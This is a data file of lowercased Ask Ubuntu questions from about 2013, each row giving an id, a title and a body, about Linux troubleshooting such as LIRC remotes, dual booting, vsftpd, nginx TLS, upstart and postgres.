319108	avs / mediagate gp-ir02bk ( tsgp-ir01 ) remote and lirc	trying to get an xbmc htp up and running using ubuntu as the os . running 13.04 since 12.04 would not install on the pc - i have a gigabyte birx mini with the i3 chip and a 64 gb msata drive . to control it , i got a mediagate ( aka avs ) from here : http : //www.rakuten.com/pr/product.aspx ? sku=206225418 i have spent hours trying to get lirc to pick it up . if i use irrecord it finds it with out issue . here is the initial start results : root @ xbmc : ~ # irrecord -- device=/dev/lirc0 myremote.conf ... ... ... found const length : 93657 please keep on pressing buttons like described above . ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. rc-6 remote control found . found possible header : 2694 863 no repeat code found . unknown encoding found . creating config file in raw mode . now enter the names for the buttons . i record a few buttons and myremote.conf looks like this : begin remote name myremote.conf flags raw_codes|const_length eps 30 aeps 100 gap 93657 begin raw_codes name key_up 2800 750 550 350 550 350 500 800 550 800 1400 800 550 350 550 350 500 400 500 400 500 350 550 350 500 400 500 400 500 350 550 7500 450 400 950 850 500 400 500 400 450 400 500 400 950 400 500 400 450 400 500 850 500 name key_down ... ... so everything seems to be work so far . i start lirc with the conf file and test with irw but irw does not output anything no matter which key i press . root @ xbmc : ~ # lircd -- device=/dev/lirc0 myremote.conf root @ xbmc : ~ # irw [ /code ] the usb receiver blinks to confirm it is receiving a signal . if i watch the port directly i do get output : [ code ] root @ xbmc : /dev # cat /dev/lirc0 ÿÿÿð ô^ & ^ & ô ª ôô^ & ^ & ^ôôô^ & ^ôputtyô èrâôô¶û¾ & , & ^ & ô ª ôôputtyô^ & ^ôôôô^ôô¶ô^ôôôrâôôð¾ ôôôrârxrâôôôôâôôôputtybââââô # ð î & ^ & ^ & & îª ôô^ & ^ & ^ôô^ & ^ôôputtyôlô¶ ôôôô ôôôâj rôâôrôrfrôôâââôputtyôôâââô âââââârâââââââ¶râââð î & ^ & ^ô & xrô^ & ^ & putty^ôôô^ & ^ôôô ôôôârôôôì^c here is how the device shows in the system : root @ xbmc : /etc # dmesg|tail [ 572.793310 ] usb 3-1 : product : ehome infrared transceiver [ 572.793315 ] usb 3-1 : manufacturer : topseed technology corp. [ 572.793319 ] usb 3-1 : serialnumber : ts000kmn [ 572.795264 ] registered ir keymap rc-rc6-mce [ 572.795475 ] input : media center ed . ehome infrared remote transceiver ( 1784:0008 ) as /devices/pci0000:00/00 00:00:14.0/usb3/3-1/3-1:1.0/rc/rc1/input11 [ 572.795668 ] rc1 : media center ed . ehome infrared remote transceiver ( 1784:0008 ) as /devices/pci0000:00/0000 :00:14.0/usb3/3-1/3-1:1.0/rc/rc1 [ 572.795920 ] input : mce ir keyboard/mouse ( mceusb ) as /devices/virtual/input/input12 [ 572.796312 ] rc rc1 : lirc_dev : driver ir-lirc-codec ( mceusb ) registered at minor = 0 [ 572.937660 ] mceusb 3-1:1.0 : registered topseed technology corp. ehome infrared transceiver with mce emulato r interface version 1 [ 572.937671 ] mceusb 3-1:1.0 : 2 tx ports ( 0x0 cabled ) and 2 rx sensors ( 0x0 active ) root @ xbmc : /etc $ cat /proc/bus/input/devices i : bus=0003 vendor=1784 product=0008 version=0101 n : name= '' media center ed . ehome infrared remote transceiver ( 1784:0008 ) '' p : phys=usb-0000:00:14.0-1 s : sysfs=/devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.0/rc/rc1/input11 u : uniq= h : handlers=kbd event2 b : prop=0 b : ev=100013 b : key=fff 0 200108fc32e 237605100000000 0 700158000 419200004001 8e968000000000 10000000 b : msc=10 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' mce ir keyboard/mouse ( mceusb ) '' p : phys=/input0 s : sysfs=/devices/virtual/input/input12 u : uniq= h : handlers=sysrq kbd mouse0 event3 b : prop=0 b : ev=100017 b : key=30000 7 ff87207ac14057ff febeffdfffefffff fffffffffffffffe b : rel=3 b : msc=10 any ideas ? thanks ernie
319110	boot problem on an hp mini 1000	i recently acquired an hp mini 1000 that had been purged of the operating system . there is no cd , only usb ports . i downloaded ubuntu 12.04 onto a flash drive , stuck it in the notebook , told it to boot from the usb and got a black screen `` no bootable partiton in table '' . how do i use ubuntu to boot my conputer . thanks .
319111	unable to update or reinstall flash player after update	yesterday my computer ran an update and lost flashplayer . if i try reinstalling it does the same thing which is it ca n't reach the source or something . sorry i 'm not computer savvy at all , came to ubuntu cos i had to and now do n't want to leave , so i 'm not so good at explaining what 's wrong tecnically . i see others have had a similar problem when updating through a proxy but i 'm 99 % sure my home network has no proxy 's set ( my flatmate assures me of this ) . i 'm on ubuntu 12.04 i think and use firefox . the install seems to run fine until it gets to : flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.297.orig.tar.gz it then freezes up for a bit and spits a few dummies before coming up with failure to download extra data files the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . i then try again and it opens a new terminal where it tries to download again from the previous site . again it just sort of freezes up and after awhile terminal closes but nothing is resolved/flash still does n't work . in case it 's useful i 'll paste my terminal script below , any help would be very appreciated as i do n't really want to have to go back to using windows . user : ~ $ sudo apt-get install flashplugin-installer [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : compiz-plugins compiz-plugins-main python-compizconfig python-central use 'apt-get autoremove ' to remove them . suggested packages : x-ttcidfont-conf ttf-xfree86-nonfree xfs the following new packages will be installed : flashplugin-installer 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 0 b/6,932 b of archives . after this operation , 139 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package flashplugin-installer . ( reading database ... 509266 files and directories currently installed . ) unpacking flashplugin-installer ( from ... /flashplugin-installer_11.2.202.297ubuntu0.12.04.1_i386.deb ) ... processing triggers for update-notifier-common ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.297.orig.tar.gz traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 93 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 239 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 344 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 954 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 814 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 776 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 757 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 571 , in create_connection raise err ioerror : [ errno socket error ] [ errno 101 ] network is unreachable setting up flashplugin-installer ( 11.2.202.297ubuntu0.12.04.1 ) ...
319114	is this partial upgrade safe to do ?	i recently installed nemo to replace nautilus as my file manager ( as detailed here ) in ubuntu 13.04 . ever since that , the update manager keeps saying i should run a `` partial upgrade '' . ( the answer here did not solve the problem . ) is the upgrade safe to run ? here are the packages it lists : install : caribou cinnamon-screensaver gir1.2-gtkclutter-1.0 linux-headers-3.8.0-26 linux-headers-3.8.0-26-generic linux-image-3.8.0-26-generic linux-image-extra-3.8.0-26-generic python-pyatspi2 python-pyatspi remove : gnome-screensaver upgrade : banshee cinnamon cinnamon-common linux-generic linux-headers-generic linux-headers-generic-pae linux-image-generic
319121	modification of stack size by ulimit -s	when i type ulimit -s in terminal it shows 8192 . does it mean that in my c code i could only have local variable of 8192 bytes ? i am confused which stack size . does ulimit -s change when we modify its value ?
319124	creating tar fills system cache	my situation is pretty simple : i backup-ed some of my documents and put them on a nas and since i rather transfer one big file instead of million small ones , i created a tar tar cf backup/2013-07-12-pictures.tar pictures my pictures directory contains about 12gb of data and what happens is , that my cache fills up steadily . if i tar some more files ( e.g . my projects , whatever ) it does n't take long and all of my 32gb ram are used : sheldor : ~ $ free -g total used free shared buffers cached mem : 31 31 0 0 0 27 -/+ buffers/cache : 2 28 swap : 29 0 29 at this point , although the mouse and the system is in general responsible , starting programs ( which reads from disk ) takes ages . literally ages : i have an ssd and starting chrome which usually takes a second needs now about 2 minutes . now you find all those posts on the internet about that it is bad to clear the cache and so on . here , on ask ubuntu you find such a post too which saved my life by providing the command sudo sync & & sudo sysctl -w vm.drop_caches=3 if you read through the comments , you find for instance this here : this is not a problem , this is how the page cache works . it will keep things cached as long as possible , but release items automatically when memory pressure from other applications increases . clearing it up manually is unnecessary . â caesium nov 22 '11 at 16:08 what ? my system ( intel core i7 3.50ghz ă 8 , 32gb ram , nvidia gtx 590 ) was frozen after a simple tar . i mean , how much pressure do i have to make before my cache is freed automatically ? question : is there a way to tweak settings so my cache gets cleared more often ? or is this just something i have to live with ?
319125	bandwidth limits for app file downloads	i have an android app that teaches users spanish/russian/italian . basically the app is a series of 10 audio lessons . to keep the app size small , i 'm included none of the audio files in the binary ( apk ) file . so users are prompted to download each file , one at a time . can i use ubuntu1 for this purpose ? what if i used 1tb/month of data , is this allowed in the free ubuntu one service ?
319126	backing up nas data to local hard drive	i 'm dual-booting ubuntu 12.04 and windows 7 . the only thing i still do in windows is use double image to backup my data from my d-link dns 321 nas to a local hard drive . once i learn how to do such a backup in ubuntu , i 'll probably not use windows anymore . here are my requirements for the backup : - from my nas to a local hard drive - files in the backup are as the original files ( not in a backup format ) in ubuntu places , i can see and access my nas , but from inside linux backup programs such as duplicity and backintime , my nas is not visible . my question : is there a way in ubuntu , using software and little if any command line programming , to backup data from my nas to a local hard drive ? if so , could you please inform me ? thank you .
319127	pantheon not completely installed ?	i have just installed the pantheon shell today , and i have not found any help with this yet . i am not just a random noob , i use a bunch of other shells and i also have a few development applications on my copy of ubuntu . but ever since ive opened up pantheon , i can not find settings or this thing called the launchpad . ( if the launchpad is the app drawer up in the upper left corner , or if its the dock . i have it , if thats not what launchpad is , then i cant access it . ) i can only change my wallpaper by going back to unity , gnome , or kde . there is a system settings in the power menu ( upper right ) , but it only has language support , ubuntu one , additional drivers , and printing . i can still access the full ubuntu settings in gnome of unity . but thats it . i installed in the terminal , uninstalled , and reinstalled using the software center . please help me if any of you can ! thanks ! ! !
319128	how to solve date and time problem in a system with both windows 8 and ubuntu ?	i have installed ubuntu in my system last week which was defaultly installed with windows 8 . whenever i boot to windows after a visit to ubuntu the date and time has changed and vice versa . i have to change the date and time every time when i boot to the os.help me to solve this issue..
319131	how to change to cd rom drive in terminal ubuntu 13.04	how do you switch to the directory where the cd-rom is ? i am at name @ name-virtualbox : -s
319135	the installation tutorial of couchbase on ubuntu 12.04	i hope to install couchbase to ubuntu server 12.04 . is there any tutorial ? i try to find but no result your comment welcome
319136	how to play frets on fire with a wired xbox guitar	i just downloaded frets on fire and i was wondering how to map a wired xbox 360 guitar to ubuntu . any help would be much appreciated . thank you
319137	installing ubuntu on 24gb mssd hardware acceleration cache	i bought an hp envy touchsmart 15t-j000 quad edition notebook pc laptop with a 24gb mssd customization . i want to install ubuntu in a dual boot setup alongside the existing windows 8 os . i 've disabled secure boot and intel smart response technology , but when i try to install ubuntu , i 'm unable to identify any 24gb partition into which i can install / ( the root partition ) . any kind of help would be highly appreciated .
319138	virtualbox not working on ubuntu 12.04 64-bit ?	i 'm new to linux please help , every time i try to start up virtual box this pops up : failed to open a session for the virtual machine pc . the virtual machine 'pc ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 }
319139	software center stops working	currently i 'm updating my ubuntu 13 with software center but it stopped working . there are no error messages but is clear to me it is not progressing . is there any way to fix this ? içe never had this problem before and don know if is secure to kill the process . thanks
319141	question about dual-booting/partitioning ?	i 'm looking into partitioning my hard drive between windows 8 and linux ubuntu . i 've never done anything of the sort , so i 'm wondering how it works . if i save files while i 'm running it as ubuntu , will i be able to access those same files if i 'm running it as windows 8 , say , the next day ?
319142	what do you do to fix verification problem when seting up my twitter account on gwibber ?	i have been using gwibber for a while and liked it . i tried adding twitter and have been stuck on the verifying part of the set up . when i log in using gwibber and finds my account almost instantly . is there a fix or update i should know about ? thanks .
319144	nvidia driver wo n't install under 13.04 , wants to reboot without x , not so easy	nvidia complains that it can not install with x running . all i want to do is kill the x server , but i ca n't do that . if i kill it , it simply restarts . i found an article claiming i could change the grub parameter of the kernel to : text_ $ vt_handoff but this does n't work with 13.04 , it boots as usual into x. i tried init 1 , but it warned me not to install in single user mode either . i would probably prefer the proprietary nvidia driver , though this process is difficult and seems much , much worse than it used to be under fedora core 4 , a giant step backward in ease of installation . why is it so hard to come by instructions for something so mainstream ? why is it now so hard to shut down the x server ? as an alternative i would be willing to use the nvidia_current package , but want to be able to use dual screens , twinview to nvidia . does the open software driver support that ? does it also support rotating monitors by 90 degrees ?
319148	vsftp configuration issue	i have installed vsftpd in my local mechine ubuntu 10.04 also in remote server ubuntu 12.04 i have done same configuration for both of the mechines . but in server when user logs in usging ftp client he can view all directory including root , etc , var ... . i would like to show only his home directory , following is my vsftpd configuration . kindly advise . note : chroot_local_user=yes # example config file /etc/vsftpd.conf # # the default compiled in settings are fairly paranoid . this sample file # loosens things up a bit , to make the ftp daemon more usable . # please see vsftpd.conf.5 for all compiled in defaults . # # read this : this example file is not an exhaustive list of vsftpd options . # please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities . # # # run standalone ? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript . listen=yes # # run standalone with ipv6 ? # like the listen parameter , except vsftpd will listen on an ipv6 socket # instead of an ipv4 one . this parameter and the listen parameter are mutually # exclusive . # listen_ipv6=yes # # allow anonymous ftp ? ( beware - allowed by default if you comment this out ) . anonymous_enable=no # # uncomment this to allow local users to log in . local_enable=yes # # uncomment this to enable any form of ftp write command . write_enable=yes # # default umask for local users is 077 . you may wish to change this to 022 , # if your users expect that ( 022 is used by most other ftpd 's ) # local_umask=022 # # uncomment this to allow the anonymous ftp user to upload files . this only # has an effect if the above global write enable is activated . also , you will # obviously need to create a directory writable by the ftp user . # anon_upload_enable=yes # # uncomment this if you want the anonymous ftp user to be able to create # new directories . # anon_mkdir_write_enable=yes # # activate directory messages - messages given to remote users when they # go into a certain directory . dirmessage_enable=yes # # if enabled , vsftpd will display directory listings with the time # in your local time zone . the default is to display gmt . the # times returned by the mdtm ftp command are also affected by this # option . use_localtime=yes # # activate logging of uploads/downloads . xferlog_enable=yes # # make sure port transfer connections originate from port 20 ( ftp-data ) . connect_from_port_20=yes # # if you want , you can arrange for uploaded anonymous files to be owned by # a different user . note ! using `` root '' for uploaded files is not # recommended ! # chown_uploads=yes # chown_username=whoever # # you may override where the log file goes if you like . the default is shown # below . # xferlog_file=/var/log/vsftpd.log # # if you want , you can have your log file in standard ftpd xferlog format . # note that the default log file location is /var/log/xferlog in this case . # xferlog_std_format=yes # # you may change the default value for timing out an idle session . # idle_session_timeout=600 # # you may change the default value for timing out a data connection . # data_connection_timeout=120 # # it is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user . # nopriv_user=ftpsecure # # enable this and the server will recognise asynchronous abor requests . not # recommended for security ( the code is non-trivial ) . not enabling it , # however , may confuse older ftp clients . # async_abor_enable=yes # # by default the server will pretend to allow ascii mode but in fact ignore # the request . turn on the below options to have the server actually do ascii # mangling on files when in ascii mode . # beware that on some ftp servers , ascii support allows a denial of service # attack ( dos ) via the command `` size /big/file '' in ascii mode . vsftpd # predicted this attack and has always been safe , reporting the size of the # raw file . # ascii mangling is a horrible feature of the protocol . # ascii_upload_enable=yes # ascii_download_enable=yes # # you may fully customise the login banner string : ftpd_banner=welcome to liveimagestock.com # # you may specify a file of disallowed anonymous e-mail addresses . apparently # useful for combatting certain dos attacks . # deny_email_enable=yes # ( default follows ) # banned_email_file=/etc/vsftpd.banned_emails # # you may restrict local users to their home directories . see the faq for # the possible risks in this before using chroot_local_user or # chroot_list_enable below . chroot_local_user=yes # # you may specify an explicit list of local users to chroot ( ) to their home # directory . if chroot_local_user is yes , then this list becomes a list of # users to not chroot ( ) . # ( warning ! chroot'ing can be very dangerous . if using chroot , make sure that # the user does not have write access to the top level directory within the # chroot ) # chroot_local_user=yes # chroot_list_enable=yes # ( default follows ) # chroot_list_file=/etc/vsftpd.chroot_list # # you may activate the `` -r '' option to the builtin ls . this is disabled by # default to avoid remote users being able to cause excessive i/o on large # sites . however , some broken ftp clients such as `` ncftp '' and `` mirror '' assume # the presence of the `` -r '' option , so there is a strong case for enabling it . # ls_recurse_enable=yes # # customization # # some of vsftpd 's settings do n't fit the filesystem layout by # default . # # this option should be the name of a directory which is empty . also , the # directory should not be writable by the ftp user . this directory is used # as a secure chroot ( ) jail at times vsftpd does not require filesystem # access . secure_chroot_dir=/var/run/vsftpd/empty # # this string is the name of the pam service vsftpd will use . pam_service_name=vsftpd # # this option specifies the location of the rsa certificate to use for ssl # encrypted connections . rsa_cert_file=/etc/ssl/private/vsftpd.pem
319152	how to get better graphics than vesa : intel速sandybridge mobile graphics	i am currently using the vesa : intel速sandybridge mobile graphics and i must say , i do not like the appearance of almost everything . my unity is running only on 2d mode . my screen resolution is also night right . i only have the option of 1024 by 768 ( 4:3 ) yet my laptop is a 15.6inch . i am new to ubuntu . i like it so far , i just really want better graphics . beauty and appeal in a machine mean a whole lot to me .
319155	how to install ubuntu from usb ?	i want to install ubuntu on my crashed windows xp from usb..i made usb bootable and trying to install but now i stuck on grub command..i do n't know what to type ... please help . thanks
319166	software gui themes are lost	i 'm using ubuntu 12.04 at the moment and couple of days ago all of my software started to use ugly theme . ubuntu menus are ok and still using ambiance theme but software guis are changed . i tried to change the themes but that did n't work . i do n't know what is the cause of this and the solution , please advise . here is a screenshot : thanks
319167	can not find lcblas ubuntu 12.10	i was trying to use the make file of a program and i hit the following error : /usr/bin/ld : can not find -lcblas i tried the solution from https : //bugs.launchpad.net/ubuntu/+source/atlas/+bug/769180 but it did not work . can some one help me out with this ?
319169	ubuntu wo n't boot after successful installation ( black screen appears and nothing happens )	i recently installed ubuntu 12.04 lts ( dual boot win 8 ) via live usb created using pendrive linux . i have a sony vaio multi-touch screen with nvidia geforce cuda . you can check the specifications here : http : //www.sony.co.uk/product/vaio-j-series/vpcj11m1e-b after successful installation , it shows the boot menu ( purple screen ) and upon selecting ubuntu , it shows a black screen and nothing happens . i tried the recovery mode and chose failsafex option , the next screen said that `` you are running on low graphics '' and wont go any further . i upgraded grub using root option and the very same problem persists . i tried the very same version of ubuntu without installing and the behaviour wont change . do i have to find another iso file that would support the hardware of my system or is there a fix available ? kindly help me out ... .i am really struggling with this os but i want to make it work thanks
319173	already purchased software missing in the software centre	i wanted to install some stuff that should be available for ubuntu 13.04 , but when i click on an item i can either find manually or search through usc , it sometimes tells me it is not available in the current software sources . it however happens only for ( but all ) already purchased apps , but not for the stuff i have n't purchased yet . the error message is always the same : there isn’t a software package called “cave-story-plus” in your current software sources . also , reinstall previous purchases gives me a blank page . is it a bug or is there something i did wrong ? i was n't able to find an answer to it , all that google found was something about missing dependencies , which is apparently not this case . i should probably submit a bug report to launchpad , will do it later today if i find out it is not my fault . thank you very much : )
319176	is it possible to install multiple versions of octave and then choose by setting enivronment variables ?	i use ubuntu 12.04lts on an i5 with 8g ram . i was wondering whether it is possible to install two different versions of an application , specifically octave-3.2.4 and octave-3.6.4 ( in different locations of course ) and then choose which one is run by setting environment variables to point to appropriate libraries and executables and .so files and .m files etc ? i tried installing octave-3.6.3 in a user account ( as opposed to system-wide ) by compiling the source with ./configure -- prefix= $ home . the compilation worked fine and the correct executables could be run , but octave still insisted on using the system-wide paths /usr/lib /usr/local etc . do any of the package install tools , e.g . apt-get aptitude etc , allow doing such a thing ? thanks in advance .
319179	partition in my laptop	is it possible to make a partition in my laptop and run ubuntu and windows 8 side by side . and if it is then what should i do to make a partition in my laptop
319184	usb mouse does not work on some ports	laptop : lenovo ideapad z570 , os : ubuntu 12.04 usb mouse works only if connected via usb port on left side of the laptop . does not work if connected via usb ports on right side . my laptop has 2 usb ports on right side . could anyone let me know how to troubleshoot this problem .
319188	kernel panic - not syncing : fatal exception in interrupt	right from the very beginning , i have a new uefi pre-installed windows 8 system on which i installed a dual boot 64-bit ubuntu 12.04.2 lts . it was working fine except today when more than twice , my system crashed with a black screen showing the following message at the end : kernel panic - not syncing : fatal exception in interrupt i googled this and got to no particular solution . after two such crashes , i copied the log file in dmesg.0 into these two paste urls : http : //paste.ubuntu.com/5855604/ http : //paste.ubuntu.com/5855647/ these two have separate log files of separate crashed sessions . also , if its relevant here , i have a ralink wireless adapter for which i had to manually install its driver . ralink 3290 . it might be a problem with the wireless driver because it shows up only when switching on the wireless . please help .
319191	how to supply password to sudo su in script	example script : sudo su admin ls /usr/bin exit when i run it with : biske @ comp1 : ~ $ ./script then prompt is changed to : admin @ comp1 : /home/biske $ when i type exit it actually prints those lines : exit bin games include lib lib32 local sbin share src i wanted output without requiring user to enter anything . i suppose problem could be solved by feeding this sudo su commmand with password . is there a way to do it ?
319192	how to enable tls 1.2 in nginx ?	how do i enable tls 1.1 and 1.2 for ssl connections in my ubuntu 12.04 server ? i am using the following version of nginx and openssl library . $ ./nginx -v nginx version : nginx/1.2.3 $ openssl version -a openssl 1.0.1 14 mar 2012 built on : tue jun 4 07:26:06 utc 2013 platform : debian-amd64 options : bn ( 64,64 ) rc4 ( 16x , int ) des ( idx , cisc,16 , int ) blowfish ( idx ) compiler : cc -fpic -dopenssl_pic -dzlib -dopenssl_threads -d_reentrant -ddso_dlfcn -dhave_dlfcn_h -m64 -dl_endian -dtermio -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security -d_fortify_source=2 -wl , -bsymbolic-functions -wl , -z , relro -wa , -- noexecstack -wall -dopenssl_no_tls1_2_client -dopenssl_max_tls1_2_cipher_length=50 -dmd32_reg_t=int -dopenssl_ia32_sse2 -dopenssl_bn_asm_mont -dopenssl_bn_asm_mont5 -dopenssl_bn_asm_gf2m -dsha1_asm -dsha256_asm -dsha512_asm -dmd5_asm -daes_asm -dvpaes_asm -dbsaes_asm -dwhirlpool_asm -dghash_asm openssldir : `` /usr/lib/ssl ''
319195	unpack a war file to a destination folder	i know how to simply unzip a zip file to destination folder , just type the following command line in terminal : unzip file.zip -d /folder/destination obviously -d option points out the destination folder , but i does n't work for jar command line . command line 'jar -vxf file.war ' will extract file.war to the current folder , but command line 'jar -vxf file.war -d /folder/destination ' does nothing , which means there is nothing generated under folder destination . is it possible to set the destination folder for jar command line .
319199	upstart tracking wrong pid of process - not respawning	i originally asked this question on stackoverflow . then realised that this is probably a better place . i have bluepill setup to monitor my delayed_job processes . ( ruby on rails application ) using ubuntu 12.10 . i am starting and monitoring the bluepill service itself using ubuntu 's upstart . my upstart config is below ( /etc/init/bluepill.conf ) . description `` start up the bluepill service '' start on runlevel [ 2 ] stop on runlevel [ 016 ] expect daemon exec sudo /home/deploy/.rvm/wrappers/ < app_name > /bluepill load /home/deploy/websites/ < app_name > /current/config/server/staging/delayed_job.bluepill # restart the process if it dies with a signal # or exit code not given by the 'normal exit ' stanza . respawn i have also tried with expect fork instead of expect daemon . i have also tried removing the expect ... line completely . when the machine boots , bluepill starts up fine . $ ps aux | grep blue root 1154 0.6 0.8 206416 17372 ? sl 21:19 0:00 bluepilld : < app_name > the pid of the bluepill process is 1154 here . but upstart seems to be tracking the wrong pid . it is tracking a pid which does not exist . $ initctl status bluepill bluepill start/running , process 990 i think it is tracking the pid of the sudo process which started the bluepill process . this is preventing the bluepill process from getting respawned if i forcefully kill bluepill using kill -9 . moreover , i think because of the wrong pid being tracked , reboot / shutdown just hangs and i have to hard reset the machine every time . what could be the issue here ?
319202	how return back alt+ctrl+esc	can any body helps me ? i did ( alt+ctrl+esc ) in ubuntu and deleted every thing in desktop and bottom . how can i return back my desktop ?
319207	where are the pristine , untouched contents of a 12.04 .profile file ?	several files in my home directory have been disappearing . e.g . .bashrc , .bash_profile , authorized_keys and now .profile . i would like to reconstruct .profile . where can i find the .profile contents from a fresh , untouched install of ubuntu 12.04.2 ?
319208	boot loader installed on usb pendrive	i desktop with pre-installed win 7 i have install 12.04 along side windows on different partitions of my disk with my usb pendrive . ubuntu installed successfully and working fine , and win 7 also working fine . but when i am booting the system where boot menu not appearing , automatically login to win 7. when i am trying to boot with usb pen drive it showing boot menu ( grub ) , in the boot menu if i am selecting ubuntu it login to ubuntu normally . without pendrive it is not login to ubuntu . how to solve this problem . without reinstalling the os . please help me for this
319210	make backspace behave like backspace in emacs	i 'm new to emacs text editor and the fact that the backspace doesnt behave like a backspace that i have come to expect from every other text editor i have ever used is driving me crazy . emacs just eats the currently highlighted character when i press backspace . ex . : with | as the cursor ( so c is highlighted ) : ab|c with backspace i want to get : a|c what i get : ab| is there any way to config for this behaviour and are there any downsides ?
319214	hardware requirements for ubuntu and virtualization	i need to run ubuntu , other os ( e.g . win xp ) , virtualbox / wmvare / xen and open vswitch in my dell latitude c640 : cpu : p4 , 1.20 ghz , hdd : 30 gb hdd ram : 256 mb ( can be increased upto 1gb ) source : specification pdf please tell me the minimum hardware changes/upgrades i need in order to be able to install & run the above software without difficulty . kindly note i am on a tight budget so buying a new laptop/buyback is not so feasible . thanks in advance . sd
319215	libreoffice is not stable version	why ubuntu pre-installed libreoffice using release candidate version ( 4.0.2.2 ) not a stable version ( 4.0.2 ) ? i suspected that i have seen via distrowatch.com/ubuntu in packages list that using stable version . i prefer use stable version like ( 4.0.2 ) than release candidate ( 4.0.2.2 ) . i have seen in help = > about libreoffice . can ubuntu change it from rc2 version to stable version 4.0.2 ? i also like update to stable version later with added ppa libreoffice package , if it have released with really stable . because it 's more better than version before thanks .
319223	brother dcp-7030 with 12.04 - weird error	i have a dcp-7030 that i need to work on a brand-new 12.04 install ( running the fallback gnome ) . i followed the instructions here and then had to go into the cups manager , because the printer was using the wrong driver ( dcp 7025 ) , so i chose the right driver . then , i printed the test page , it printed perfectly ! however , i have had so much trouble with this brother printer that i did n't get excited , which was wise . after printing the test page , it will not print again , the printer gives me an error message of something like , please insert the paper by hand . could someone please help ? i have this printer running fine on 10.04 but i ca n't get it working properly on 12.04 ...
319228	how to setup my dual monitors	i have a nvidia video card and twin monitors . i tried using the nvidia_config and i had many problems especially after installing system updates . i have given up using the nvidia_congig tool . in order to get into my system last time because it would not boot into graphics mode i had to delete xorg.conf in /etc/x11 which enabled my computer to boot as i would expect it to . although my first screen is detected correctly my 2nd monitor is not and i do not seem to be able to set it up . can i edit a config file somewhere that will fix this problem . i am using 2 identical monitors ( aoc intl 21inch ) they both have a recommended resolution of 1920x1080 ( 16:9 ) the output from xrandr is : screen 0 : minimum 8 x 8 , current 3280 x 1080 , maximum 16384 x 16384 dvi-i-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 476mm x 268mm 1920x1080 60.0*+ 1680x1050 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 dvi-i-1 connected 1360x768+1920+11 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0* 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 dvi-i-2 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-3 disconnected ( normal left inverted right x axis y axis )
319231	how do i disable a hdd/pen drive led blinking ?	i want hardware config on ubuntu for pen drive led blinking .
319235	while installing jdk	i 'm trying to install java using the webupd ppa . after adding their ppa and updating , i try : sudo apt-get install oracle-java7-installer and it gives me an error oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
319236	postgres uninstall : `` server.key has group or world access '' error	i 'm trying to uninstall postgresql , but its really complaining . i suspect something is broken . i 'm on 12.04 , installed via apt-get . sudo apt-get remove postgresql returns : reading package lists ... done building dependency tree reading state information ... done package postgresql is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up postgresql-common ( 129ubuntu1 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-07-12 11:13:30 bst fatal : private key file `` server.key '' has group or world access 2013-07-12 11:13:30 bst detail : file must be owned by the database user or root , must have no write permission for `` group '' , and must have no permissions for `` other '' . invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql-9.1 : postgresql-9.1 depends on postgresql-common ( > = 115~ ) ; however : package postgresql-common is not configured yet . dpkg : error processing postgresql-9.1 ( -- configure ) : dependency problems - leaving unconfigured now i have tried to fix the server.key file ; i copied the snake oil file to /var/lib/postgresql/9.1/main/server.key then i have modded it : chmod 700 server.key chown postgres : postgres server.key sanity check : ls -l server.key -rwx -- -- -- 1 postgres postgres 887 jul 12 10:07 server.key but it still complains that the file has group access . would appreciate any help to remove this , forced reinstall with install -f does n't help . : (
